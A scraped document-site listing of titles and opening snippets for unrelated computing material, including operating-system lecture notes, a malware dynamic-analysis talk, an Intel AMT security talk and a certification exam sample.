More informationCertifying Program Execution with Secure Processors. Benjie Chen Robert Morris Laboratory for Computer Science Massachusetts Institute of Technology
Certifying Program Execution with Secure Processors Benjie Chen Robert Morris Laboratory for Computer Science Massachusetts Institute of Technology Motivation All PCs may soon include trusted computing
More informationReverse Engineering Malware Dynamic Analysis of Binary Malware II
Reverse Engineering Malware Dynamic Analysis of Binary Malware II Jarkko Turkulainen F-Secure Corporation Protecting the irreplaceable f-secure.com Advanced dynamic analysis Debugger scripting Hooking
More informationOperating System: Chap2 OS Structure. National Tsing-Hua University 2016, Fall Semester
Operating System: Chap2 OS Structure National Tsing-Hua University 2016, Fall Semester Outline OS Services OS-Application Interface OS Structure Chapter2 OS-Structure Operating System Concepts NTHU LSA
More informationTDDI04, K. Arvidsson, IDA, Linköpings universitet Operating System Structures. Operating System Structures Overview. Operating System Services
TDDI04 Concurrent Programming, Operating Systems, and Real-time Operating Systems Operating System Structures [SGG7] Chapter 2 Copyright Notice: The lecture notes are mainly based on Silberschatz s, Galvin
More informationAMT vpro ME. How to Become the Sole Owner of Your PC. ptsecurity.com
AMT vpro ME How to Become the Sole Owner of Your PC Mark Ermolov Maxim Goryachy Dmitry Malkin AMT disable techniques Positive Research Center What is it? Second «hidden» processor in your PC Built into
More informationCIS 21 Final Study Guide. Final covers ch. 1-20, except for 17. Need to know:
CIS 21 Final Study Guide Final covers ch. 1-20, except for 17. Need to know: I. Amdahl's Law II. Moore s Law III. Processes and Threading A. What is a process? B. What is a thread? C. Modes (kernel mode,
More informationIntroduction to OS Processes in Unix, Linux, and Windows MOS 2.1 Mahmoud El-Gayyar
Introduction to OS Processes in Unix, Linux, and Windows MOS 2.1 Mahmoud El-Gayyar elgayyar@ci.suez.edu.eg Mahmoud El-Gayyar / Introduction to OS 1 Processes in Unix, Linux, and Windows Unix pre-empted
More informationApple Exam 9L0-412 OS X Support Essentials 10.8 Exam Version: 6.3 [ Total Questions: 86 ]
s@lm@n Apple Exam 9L0-412 OS X Support Essentials 10.8 Exam Version: 6.3 [ Total Questions: 86 ] Question No : 1 You are logged into a MacBook Pro as a standard user. How can you display the OS X Mountain
More information